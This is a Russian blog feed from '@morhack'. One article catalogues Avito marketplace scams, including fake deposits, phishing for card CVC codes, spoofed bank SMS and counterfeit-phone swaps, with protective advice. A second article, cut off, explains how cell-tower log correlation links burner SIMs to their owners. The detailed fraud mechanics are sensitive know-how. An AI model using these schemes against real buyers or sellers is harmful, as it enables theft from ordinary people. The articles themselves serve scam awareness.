<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>@morhack</title><author><name>@morhack</name></author><id>https://teletype.in/atom/morhack</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/morhack?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@morhack?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/morhack?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-05-13T21:13:35.306Z</updated><entry><id>morhack:g0N3cKK3D</id><link rel="alternate" type="text/html" href="https://teletype.in/@morhack/g0N3cKK3D?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><title>Как разводят на Авито. Топ успешных способов обмана.</title><published>2020-10-15T15:36:41.232Z</published><updated>2020-10-15T15:37:58.512Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/4d/63/4d63d7a8-41e3-49c0-a1bd-369e226814a7.jpeg"></media:thumbnail><summary type="html">&lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/viber.png&quot;&gt;Привет, Юные Хакеры! MorHack, как всегда научит как не быть обманутым.</summary><content type="html">
  &lt;p&gt;Привет, Юные Хакеры! MorHack, как всегда научит как не быть обманутым.&lt;/p&gt;
  &lt;p&gt;На сайтах вроде Авито честно зарабатывают не все.&lt;/p&gt;
  &lt;p&gt;Это такая большая махина, на которой можно и заработать, и самому пострадать. Чтобы последнее не случалось с вами, MorHack разобрал самые популярные (и даже экзотические!) способы обмана народа на самом крупном сайте объявлений в СНГ.&lt;/p&gt;
  &lt;p&gt;Кидают и продавцов, и покупателей. Главное – знать, как.&lt;/p&gt;
  &lt;h2&gt;Создают фейковый ажиотаж и просят бронировать за ₽&lt;/h2&gt;
  &lt;p&gt;Самая популярная, наверное, схема. Вы находите товар, который &lt;strong&gt;стоит дешевле аналогов&lt;/strong&gt;. К примеру, iPhone X за 25 тыс. рублей, или однушку в пределах центра за 7 тыс. в месяц. Естественно, звоните и общаетесь с владельцем.&lt;/p&gt;
  &lt;p&gt;Но продавец/арендодатель говорит, что желающих хоть отбавляй, так что он предпочтет самого заинтересованного. Хотите заключить выгодную сделку? Оставьте залог в тысячу-другую, и будете первым в очереди.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/viber.png&quot; width=&quot;1082&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/viber_chat.png&quot; width=&quot;1082&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Понятно, что после такого вам ни &lt;strong&gt;iPhone не отправят&lt;/strong&gt;, ни квартиру не покажут. Особо изобретательные разводилы идут дальше – например, могут перезвонить и сказать, что кто-то готов дать больший залог.&lt;/p&gt;
  &lt;h2&gt;Спрашивают данные карты для перевода денег&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/Screenshot_1.jpg&quot; width=&quot;1099&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;А так часто разводят продавцов. Звонит покупатель, говорит, что готов купить ваш товар прямо сейчас. Но для перевода &lt;strong&gt;нужны данные вашей карты&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Да-да, не только номер, но и &lt;strong&gt;срок действия, а также CVC/CVV&lt;/strong&gt;. А также код, который придёт вам в сообщении.&lt;/p&gt;
  &lt;p&gt;Другой вариант: после того, как вы отправляете номер карты, звонят якобы из банка и говорят, что платёж от юрлица / с премиум-карты / произошла ошибка, просят те же данные.&lt;/p&gt;
  &lt;p&gt;Думаете, никто не ведётся? А как же!&lt;/p&gt;
  &lt;h2&gt;Продают якобы «конфискат»&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/46c7bae413b06c7c2fc2620f69d2684d.png&quot; width=&quot;1024&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/4ff68d59e1427c04a6c9ecf4330c1dde.png&quot; width=&quot;1024&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Макбук за 10 тыс. рублей. Б/у, но рабочий, «белый», не бит, не крашен, мамой клянусь. А дешево, потому что &lt;strong&gt;арестованная техника&lt;/strong&gt;, распродаётся по бросовым ценам, налетай!&lt;/p&gt;
  &lt;p&gt;Оплатить такой товар предлагают наложенным платежом, и это нормально. Но вот за доставку деньги просят сразу: &lt;strong&gt;курьер принесёт лично в руки&lt;/strong&gt;, а у них такой формат работы.&lt;/p&gt;
  &lt;p&gt;Другой вариант – предлагают оплатить доставку. Остальное при получении.&lt;/p&gt;
  &lt;p&gt;Кстати, владелец техники быстро переходит на &lt;strong&gt;общение вне площадки&lt;/strong&gt;. Чтобы модераторы сайта не забанили за развод и удалось быстро окучить больше жертв.&lt;/p&gt;
  &lt;p&gt;Вы же понимаете, что не дождетесь курьера?&lt;/p&gt;
  &lt;h2&gt;Не подтверждают перевод денег и не отдают товар&lt;/h2&gt;
  &lt;p&gt;Ещё одна схема с участием курьера. Продавец настаивает на курьерской доставке, оплату предлагает отправить &lt;strong&gt;со своим курьером&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Но внезапно перед сделкой продавец перезванивает и говорит, что курьер работает второй день, поэтому &lt;strong&gt;не вызывает доверия&lt;/strong&gt;, сбросьте деньги на карту. Не сейчас, а когда осмотрите товар.&lt;/p&gt;
  &lt;p&gt;Курьер действительно приезжает, вы осматриваете товар, переводите деньги владельцу. Но курьер товар не отдает – созванивается с начальником, и тот говорит, что &lt;strong&gt;оплата не прошла&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Но у вас всё списалось. Выясняется, что вы перевели деньги не на ту карту! А значит, никто вам покупку не отдаст. Пишите письмо в банк и требуйте деньги обратно.&lt;/p&gt;
  &lt;p&gt;Что же произошло на самом деле: мошенник заказал нужный товар в магазине с «серяком», сказал, что оплата пройдёт &lt;strong&gt;переводом с карты на карту&lt;/strong&gt;. Магазин отправил к вам курьера с товаром.&lt;/p&gt;
  &lt;p&gt;Курьер подъехал, но деньги на счет владельца магазина действительно от вас не пришли. Вы их отправили мошенникам.&lt;/p&gt;
  &lt;p&gt;Вывод: не бейте курьера, он не виноват. В банк, к слову, написать действительно стоит. Как минимум, чтобы усложнить жизнь мошенникам.&lt;/p&gt;
  &lt;h2&gt;Принимают на работу с предоплатой&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/02/QIP-Shot-Screen-057-1.jpg&quot; width=&quot;700&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Чаще всего так разводят людей, которые &lt;strong&gt;ищут работу&lt;/strong&gt;. Мошенник размещает объявление о позиции с хорошими условиями и «вкусной» зарплатой. Но чтобы убедиться в серьёзности ваших намерений, требует оплатить затраты.&lt;/p&gt;
  &lt;p&gt;Мотивация может быть разной. Обычно предлагают оплатить расходные материалы для надомной работы, подготовку резюме или даже оформление банковской карты, на которую вам будут платить деньги.&lt;/p&gt;
  &lt;p&gt;После получения оплаты работодатель или посредник &lt;strong&gt;исчезает&lt;/strong&gt;.&lt;/p&gt;
  &lt;h2&gt;Указывают для обратной связи платный номер&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/Screenshot_2.jpg&quot; width=&quot;613&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;В объявлениях или личных сообщениях, которые сыплются в мессенджеры, может быть указан платный телефонный номер. Стоимость минуты разговора по нему исчисляется &lt;strong&gt;сотнями рублей&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Другой вариант — покупатель набирает вас несколько раз и сбрасывает. Затем приходит &lt;strong&gt;SMS с просьбой перезвонить&lt;/strong&gt;, деньги на счету закончились.&lt;/p&gt;
  &lt;p&gt;«Лечение» простое: &lt;strong&gt;загуглить&lt;/strong&gt; номер телефона. Обычно информация о подобных разводах быстро расходится по сети.&lt;/p&gt;
  &lt;p&gt;Кроме того, можно попробовать связаться по Viber или WhatsApp. У настоящих покупателей мессенджеры часто подключены на основной номер.&lt;/p&gt;
  &lt;h2&gt;Продают машину под арестом, а квартиру – в залоге&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/02/222-1.jpg&quot; width=&quot;860&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Бывает, что залог просят на стадии осмотра товара. Чаще всего такое проворачивают с машинами и квартирами.&lt;/p&gt;
  &lt;p&gt;Итак, вы приходите, смотрите, вас всё устраивает. Продавец говорит, что вы не первый, кто ухватился за лакомый кусок. Так что &lt;strong&gt;внесите залог&lt;/strong&gt; – и больше никому машину/квартиру не покажут.&lt;/p&gt;
  &lt;p&gt;Проблемы обнаруживаются в момент сделки. К примеру, машина находится под арестом, а квартира – в залоге. Даже если у вас есть расписка или договор, доказать что-то в суде будет затруднительно. Особенно если в договоре написано, что залог не возвращается. Да и кто-то будет заморачиваться ради нескольких тысяч.&lt;/p&gt;
  &lt;h2&gt;Сдают квартиры по нескольку раз&lt;/h2&gt;
  &lt;p&gt;Мошенничество с недвижимостью – вообще отдельная длинная и сложная тема. Но вот ещё один популярный развод: вы приходите смотреть квартиру, которую хотите снять, подписываете договор с владельцем. Но въехать разрешают не сразу, а, к примеру, &lt;strong&gt;через пару дней&lt;/strong&gt; – клининг должен навести порядок.&lt;/p&gt;
  &lt;p&gt;В назначенный срок вы приходите в эту квартиру, а там &lt;strong&gt;уже кто-то живет&lt;/strong&gt;. Или на лестничной площадке встречаетесь с людьми, подписавшими договор аренды той же квартиры.&lt;/p&gt;
  &lt;p&gt;Удачливые мошенники могут «сдавать» квартиры 3-5 разным арендаторам. При этом сами снимают квартиру у владельца на день-другой – этого хватает для показов.&lt;/p&gt;
  &lt;p&gt;Что делать? Не давать никаких денег, пока не увидите &lt;strong&gt;правоустанавливающие документы на квартиру и паспорт владельца&lt;/strong&gt;. И не получите ключи. Кстати, документы лучше сфотографировать на этапе показа – если владелец будет нервничать, это повод отказаться от сделки.&lt;/p&gt;
  &lt;h2&gt;Предлагают заключить договор, прежде чем покажут квартиру&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/31-4.jpg&quot; width=&quot;1000&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вы звоните по объявлению о сдаче квартиры, и вот незадача! Она уже сдана.&lt;/p&gt;
  &lt;p&gt;Но вы не волнуйтесь, это же большое агентство, вам предложат варианты ещё лучше. Достаточно &lt;strong&gt;заключить договор на подбор&lt;/strong&gt; – читай, заплатить несколько тысяч за доступ к базе.&lt;/p&gt;
  &lt;p&gt;Договор на самом деле ничего не гарантирует. В нём может быть указано ограниченное количество вариантов, которые вам покажет риэлтор, или фиксированное время действия.&lt;/p&gt;
  &lt;p&gt;А потом перед вами просто разведут руками – сами виноваты, что ничего вам не нравится. А то, что предлагали всё вдвое дороже, чем нужно, или вовсе не в том районе – &lt;strong&gt;ваши проблемы&lt;/strong&gt;.&lt;/p&gt;
  &lt;h2&gt;Обманывают с доставкой и крадут товар&lt;/h2&gt;
  &lt;p&gt;Казалось бы, если вы покупаете специализированную технику у юрлица и просите водителя отзвониться, когда её погрузят, чтобы перевести деньги, развести вас никак не могут. Но нет!&lt;/p&gt;
  &lt;p&gt;Он не только отправил предоплату. Мошенникам, вероятно, удалось узнать номер водителя, который должен был доставить груз, и клонировать его.&lt;/p&gt;
  &lt;p&gt;Тут дело техники: якобы водитель отзвонился и сообщил, что всё в порядке. Правда, фото и видео погрузки прислать не смог – якобы за городом плохой интернет.&lt;/p&gt;
  &lt;p&gt;Водителем представились мошенники. Покупатель «попал» на всю сумму – &lt;strong&gt;120 тыс. рублей&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Мораль: не покупайте что-то сильно дешевле рынка и лично всё контролируйте.&lt;/p&gt;
  &lt;h2&gt;Клонируют чужие объявления и разводят других&lt;/h2&gt;
  &lt;p&gt;В объявлении вы видите &lt;strong&gt;подозрительно дешевый товар&lt;/strong&gt; (так начинаются почти все истории о мошенничестве). Связываетесь с продавцом, просите дополнительные фото, видео и так далее. Получаете их и убеждаетесь, что всё ОК.&lt;/p&gt;
  &lt;p&gt;Переводите деньги в обмен на сканы паспорта / прав / свадебной фотографии бабушки с дедушкой. И вот тут начинается развод: вам ничего не отправляют.&lt;/p&gt;
  &lt;p&gt;Дело в том, что вы общались с мошенником, который был &lt;strong&gt;посредником&lt;/strong&gt; между вами и реальным продавцом. Именно реальный продавец делал все фото (в том числе и скан паспорта).&lt;/p&gt;
  &lt;p&gt;Просто где-то между оплатой вами покупки и отправкой товара мошенник &lt;strong&gt;внезапно отказался от покупки&lt;/strong&gt;. И разжалобил продавца – попал в больницу, нужны лекарства, а не новый смартфон, давайте отменим сделку.&lt;/p&gt;
  &lt;p&gt;Продавец вошел в положение и вернул деньги. Но не вам, а &lt;strong&gt;мошеннику&lt;/strong&gt;. Занавес.&lt;/p&gt;
  &lt;h2&gt;…или представляются вами и забирают товар из вашего объявления&lt;/h2&gt;
  &lt;p&gt;Мошенник видит ваш товар, создаёт такое же объявление и находит покупателя. Покупатель переводит деньги вам, вы &lt;strong&gt;отправляете товар мошеннику&lt;/strong&gt;. Он остаётся с товаром, а покупатель через банк возвращает перевод, обвиняя вас в мошенничестве.&lt;/p&gt;
  &lt;p&gt;Защититься просто: отправляйте наложенным платежом или передавайте лично в руки в обмен на деньги.&lt;/p&gt;
  &lt;h2&gt;Классика: вместо оригинального айфона продают китайский&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/iphone-X-china-clone-5.jpg&quot; width=&quot;940&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;В этой схеме мошенники действуют в паре. Они покупают на китайских сайтах &lt;strong&gt;подделки под iPhone&lt;/strong&gt; или другие дорогие смартфоны, а затем сбывают их по цене настоящих.&lt;/p&gt;
  &lt;p&gt;Казалось бы, никаких подозрений: вы встречаетесь с продавцом, чтобы осмотреть товар и заплатить за него при встрече. В какой-то момент продавец предлагает проверить связь – позвонить с вашего смартфона на новый.&lt;/p&gt;
  &lt;p&gt;В этот момент мошенник &lt;strong&gt;подменяет смартфон&lt;/strong&gt;, а его коллега звонит на фейковый iPhone. А потом достаточно быстро запаковывает его в коробку или в чехол. В другом варианте мошенник «по привычке» кладёт смартфон после звонка в карман и достаёт уже другой гаджет.&lt;/p&gt;
  &lt;p&gt;Доказать мошенничество практически невозможно. Полиция не поверит, что вы не сами подменили смартфон в коробке. Будьте внимательны!&lt;/p&gt;
  &lt;h2&gt;Предлагают отправить счёт на оплату с банкомата&lt;/h2&gt;
  &lt;p&gt;Этим способом часто разводят продавцов не слишком дорогих вещей. Покупатель звонит, говорит, что из другого города и нужна доставка. А чтобы оплатить покупку, приглашает продавца подойти к банкомату и якобы &lt;strong&gt;сбросить ему счет на оплату&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Обычно в схеме используют банкоматы «Сбербанка». При этом другие способы оплаты покупатели категорически отвергают.&lt;/p&gt;
  &lt;p&gt;Продавцы, которые никогда таких счетов не создавали, ведутся. В итоге &lt;strong&gt;сами переводят деньги злоумышленникам&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;На самом деле выставить счёт можно и в мобильном приложении. Да и реквизиты на оплату с карты того же или другого банка практически любой мобильный банкинг формирует.&lt;/p&gt;
  &lt;h2&gt;Покупатель «отправляет» больше денег, чем нужно&lt;/h2&gt;
  &lt;p&gt;Предположим, вы продаёте товар за &lt;strong&gt;20 тыс. рублей&lt;/strong&gt;. Договариваетесь с покупателем, сбрасываете реквизиты, но вместо 20 тыс. вам приходит целых &lt;strong&gt;40 тыс.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Здесь возможны два варианта. Первый — поддельная SMS, отправленная не с номера банка, а из онлайн-сервиса. К примеру, ноль в номере заменен буквой О либо отправитель указан как Bank, хотя вы привыкли получать такие сообщения с конкретного номера. Вот пример: аватар Сбербанка, номер 9ОО (девятка и буквы “О”) вместо номера 900:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/01/1517927971174817241.jpg&quot; width=&quot;700&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Второй вариант сложнее. Деньги к вам на счёт действительно поступают, но затем звонит покупатель и говорит, мол, ошибся, переведите половину обратно на такую-то карту.&lt;/p&gt;
  &lt;p&gt;Многие продавцы входят в положение и деньги переводят. Но потом остаются и без них, и без изначальных 40 тыс., да ещё и с картой, заблокированной за мошенничество.&lt;/p&gt;
  &lt;p&gt;А всё потому, что деньги вам перевел &lt;strong&gt;совсем другой человек&lt;/strong&gt;, который хотел купить какой-нибудь iPhone XS за 40 тыс. Считая, что его кинули, покупатель пишет заявление в банк. Тот блокирует вашу карту и начинает разбирательство.&lt;/p&gt;
  &lt;p&gt;Настоящий мошенник при этом остаётся с вашими 20 тыс. И вашим товаром.&lt;/p&gt;
  &lt;h2&gt;Присылают таксиста и «отправляют» деньги по SMS&lt;/h2&gt;
  &lt;p&gt;Покупатель из вашего же города звонит и говорит, что товар нужен срочно. Поэтому он договорится с таксистом, чтобы тот осмотрел товар и, если всё ОК, вам за него переведут деньги.&lt;/p&gt;
  &lt;p&gt;Таксист действительно приезжает, даёт команду на перевод денег, после чего вам поступает &lt;strong&gt;SMS из банка&lt;/strong&gt;. Вы отдаёте товар, такси уезжает.&lt;/p&gt;
  &lt;p&gt;Но из банка ли пришла SMS? Внимательно проверьте номер отправителя — он может быть &lt;strong&gt;поддельным&lt;/strong&gt;. Да и вообще, лучше удостовериться в мобильном банке, что деньги пришли на счет, а до этого никому ничего не отдавать.&lt;/p&gt;
  &lt;h2&gt;Подменивают товар на подделку, отказываются и отправляют обратно&lt;/h2&gt;
  &lt;p&gt;Покупатель предлагает отправить товар наложенным платежом. Но затем по каким-то причинам отказывается его брать.&lt;/p&gt;
  &lt;p&gt;Честно говоря, сотрудники транспортных компаний, почтовых и курьерских служб не всегда внимательно следят, как покупатель осматривает товар. Так что подменить реальный iPhone на китайскую подделку — раз плюнуть.&lt;/p&gt;
  &lt;p&gt;Если вам вернули товар, внимательно осмотрите его. Если что-то пошло не так, пишите заявление в транспортной компании и требуйте разобраться в ситуации.&lt;/p&gt;
  &lt;h2&gt;Присылают ссылку на сайт с вирусами или крадут логин Авито&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/02/scums-phone-1.jpg&quot; width=&quot;428&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Мошенники находят ваш номер телефона на сайте объявлений и отправляют SMS с предложением обмена с доплатой. В сообщении указывают ваше имя или название товара, а также ссылку на свой вариант.&lt;/p&gt;
  &lt;p&gt;Но ссылка ведёт на сайт с &lt;strong&gt;вредоносным ПО&lt;/strong&gt;. Оно заражает ваш смартфон вирусом-вымогателем или перехватывает пароли от интернет-банкинга.&lt;/p&gt;
  &lt;h2&gt;Просят подтвердить перевод по ссылке&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/02/1505074441138970785-1.jpg&quot; width=&quot;720&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Покупатель предлагает оплатить товар новым для вас способом. Чтобы получить перевод, вам нужно будет &lt;strong&gt;перейти по ссылке,&lt;/strong&gt; указать данные карты и забрать деньги. Или убедиться, что платёж прошел.&lt;/p&gt;
  &lt;p&gt;Но заполнив форму на сайте, вы отдадите ключи от своего банковского счета мошеннику. И лишитесь средств.&lt;/p&gt;
  &lt;h2&gt;Переводят на фейковый сайт Авито или платёжной системы&lt;/h2&gt;
  &lt;p&gt;Преступник размещает объявление на популярном сайте, но говорит, что в сети бывает редко. В описании даёт &lt;strong&gt;ссылку на другой ресурс&lt;/strong&gt;: вот такое же объявление от жены, звоните ей.&lt;/p&gt;
  &lt;p&gt;Ссылка ведёт на фейковый сайт. Он выглядит почти так же, как настоящий, но если оплачивать там, деньги уйдут мошенникам. А товар вы не получите.&lt;/p&gt;
  &lt;h2&gt;Вымогают деньги за разблокировку купленного айфона&lt;/h2&gt;
  &lt;p&gt;Схему проворачивают с покупкой техники Apple, которая защищена Apple ID, реже — с гаджетами на Android. Вы отправляете посылку наложенным платежом, покупатель при осмотре меняет Apple ID или ставит блокировку по отпечатку пальца / паролю и т. д., затем возвращает товар.&lt;/p&gt;
  &lt;p&gt;Когда вы получаете технику назад, то &lt;strong&gt;не можете её разблокировать&lt;/strong&gt;. Связываетесь с покупателем, но тот просит скидку или просто деньги на счет в обмен на разблокировку.&lt;/p&gt;
  &lt;p&gt;Другой вариант – мошенник просит зайти со своего iCloud на вашем устройстве, затем меняет пароль и требует денег за разблокировку:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://www.iphones.ru/wp-content/uploads/2019/02/1529178404183696046-1.jpg&quot; width=&quot;835&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2&gt;Требуют скан паспорта для оформления возврата&lt;/h2&gt;
  &lt;p&gt;Схема редкая, но если сотрудник службы доставки в доле, срабатывает. Покупатель просит отправить посылку наложенным платежом, но перед этим &lt;strong&gt;требует скан вашего паспорта&lt;/strong&gt;. От посылки он отказывается, а затем по вашему паспорту получает возврат.&lt;/p&gt;
  &lt;p&gt;Как защититься: если вы отправляете посылку наложенным платежом, покупателю ваши документы видеть незачем.&lt;/p&gt;
  &lt;h2&gt;Вместо резюме&lt;/h2&gt;
  &lt;p&gt;Никаких предоплат. Нигде и никогда. Просто запомните это – решает 99% проблем.&lt;/p&gt;
  &lt;p&gt;Если вы всё же пострадали от мошенников, &lt;strong&gt;обращайтесь в полицию&lt;/strong&gt;. Предоставляйте максимум информации – чеки, квитанции, документы, номера телефонов и карт, историю звонков (а лучше их записи), фото документов.&lt;/p&gt;
  &lt;p&gt;Правда, если сумма ущерба небольшая, в возбуждении дела могут отказать. Тогда придётся искать других пострадавших и подавать коллективный иск.&lt;/p&gt;
  &lt;p&gt;Кроме того, стоит сообщить администрации сайта объявлений о мошенниках,&lt;strong&gt; заблокировать карту в банке&lt;/strong&gt;, если это необходимо, и разместить информацию о преступниках в открытом доступе. Всё это быстро и бесплатно.&lt;br /&gt;&lt;/p&gt;
  &lt;h2&gt;🔥ПРОФИТ!&lt;/h2&gt;
  &lt;p&gt;Вот и все дорогие хакерята! Фантастика превратилась в реальность!&lt;br /&gt;Обязательно подписывайтесь и зовите друзей, не зря же я стараюсь! &lt;/p&gt;

</content></entry><entry><id>morhack:5ZRbVDT-0</id><link rel="alternate" type="text/html" href="https://teletype.in/@morhack/5ZRbVDT-0?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><title>Как узнать местонахождение человека по номеру?</title><published>2020-10-15T15:23:29.194Z</published><updated>2020-10-15T15:23:29.194Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/aa/ff/aaffec39-6aa9-4024-a486-23af1cc81419.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/1a/73/1a73ab35-e7ed-4993-a37e-218c1b51a1f1.png&quot;&gt;Привет, мои хакерята!
Эта статья написана только для образовательных целей. Автор не публиковал эту 
статью для вредоносных целей. Если читатели хотели бы воспользоваться 
информацией для личной выгоды, то автор не несёт ответственность за любой 
причиненный вред или ущерб.
Существует огромное количество мифов и домыслов, как именно могут найти по 
анонимному номеру анонимного мобильного телефона. MorHack же знает правду и 
сейчас ею поделится.</summary><content type="html">
  &lt;p&gt;Привет, мои хакерята!&lt;br /&gt;Эта статья написана только для образовательных целей. Автор не публиковал эту &lt;br /&gt;статью для вредоносных целей. Если читатели хотели бы воспользоваться &lt;br /&gt;информацией для личной выгоды, то автор не несёт ответственность за любой &lt;br /&gt;причиненный вред или ущерб.&lt;br /&gt;Существует огромное количество мифов и домыслов, как именно могут найти по &lt;br /&gt;анонимному номеру анонимного мобильного телефона. MorHack же знает правду и &lt;br /&gt;сейчас ею поделится.&lt;/p&gt;
  &lt;p&gt;Бытует три распространенные версии: пеленгуют т.е. определяют источник &lt;br /&gt;радиосигнала, вычисляют специальным оборудованием на базовых станциях &lt;br /&gt;сотовой сети и вычисляют через разные скрытые возможности, якобы специально &lt;br /&gt;имеющиеся в каждом телефоне.&lt;br /&gt;Я поучаствовал в настоящем расследовании настоящего дела, где преступника &lt;br /&gt;вычислили по его мобильному телефону. И скажу следующее: первая версия &lt;br /&gt;немного содержит правды, но главный способ поимки не имеет ничего общего со &lt;br /&gt;всеми тремя.&lt;br /&gt;Говоря в целом, следствие и криминалисты только в кино используют крутые &lt;br /&gt;спецсредства и дорогую аппаратуру. В реальности главный инструмент &lt;br /&gt;следователя - его голова и бумажки. А главный метод - язык не повернется сказать &lt;br /&gt;&amp;quot;дедукция&amp;quot;, - назовём это &amp;quot;поиском закономерностей&amp;quot; или &amp;quot;статистика&amp;quot;. И ещё &lt;br /&gt;есть такая штука как Время. &lt;br /&gt;Время всегда против анонимности: что-то мы делаем слишком вовремя, а что-то &lt;br /&gt;совсем не вовремя. И если где-то есть логи наших дел с отметками времени - нам &lt;br /&gt;не скрыться. А логи в мобильной связи ведутся по каждому байту. Далее &lt;br /&gt;подробнее.&lt;/p&gt;
  &lt;h3&gt;Как вычисляют, того, кто работает с левой сим-карты?&lt;/h3&gt;
  &lt;p&gt;Вы не поверите: по &amp;quot;ведущему&amp;quot; телефону - Вашему настоящему. Внимательно &lt;br /&gt;прочитав следующий абзац Вы поймёте, как всё легко, просто и быстро. В описании&lt;br /&gt;используется термин &amp;quot;включение&amp;quot; - это момент, когда &amp;quot;анонимный&amp;quot; аппарат вышел &lt;br /&gt;в сеть. Итак, поехали, рассмотрим разные ситуации.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Ситуация первая&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Вы пользуетесь &amp;quot;анонимным&amp;quot; мобильником, а настоящий находится рядом и &lt;br /&gt;включен. Следователи запрашивают логи всей соты в которой работает (работал) &lt;br /&gt;&amp;quot;анонимный&amp;quot; аппарат. Это всё, что им потребуется, что бы Вас вычислить (причем &lt;br /&gt;не только &amp;quot;по горячим следам&amp;quot;, но и через неделю, месяц, не спеша, в кресле &lt;br /&gt;своего кабинета за чашечкой кофе). Делают рекурсивные выборки по промежуткам &lt;br /&gt;включения и смотрят кто ещё был в соте кроме &amp;quot;анонимного&amp;quot; аппарата. &lt;br /&gt;Например в одной соте были ещё 1000 включенных телефонов. При следующем &lt;br /&gt;включении 500 из тех, что были в первый раз. При следующем - 20 из тех, кто был в &lt;br /&gt;первый и второй раз. Чаще всего удается с логов трех-четырех включений найти &lt;br /&gt;точно пару телефонов, которые не покидают соту. Реже включений требуется &lt;br /&gt;больше: в таком случае можно попробовать пробить историю по номерам &lt;br /&gt;множеств совпадений, а так же их владельцев. Если это бабуля 90 лет из которых &lt;br /&gt;номер у неё уже 10 лет и квартиру она не покидала 5 лет, то, явно вариант отпадает. &lt;br /&gt;Таким образом следователи достаточно быстро выходят на настоящий номер &lt;br /&gt;телефона, одна история звонков по которому раскроет все карты. Нередко &lt;br /&gt;спецслужбам везет и с 2 включения: быстро изучить и отмести сотни номеров - &lt;br /&gt;дело лишь в количестве сотрудников. Бывает даже, что на настоящий номер &lt;br /&gt;выходят с первого и единственного включения &amp;quot;анонимного&amp;quot;! Не верите? А зря. &lt;br /&gt;Динамика в соте, поведение других аппаратов, будни / праздники могут &lt;br /&gt;существенно упростить работу силовиков. Могут во время работы &amp;quot;анонимного&amp;quot; &lt;br /&gt;мобильника все остальные выйти из соты, кроме Вашего (ну взяли остальные люди &lt;br /&gt;и переместились куда-то) или делать исходящие, отправлять СМС. Сейчас такое &lt;br /&gt;время, когда 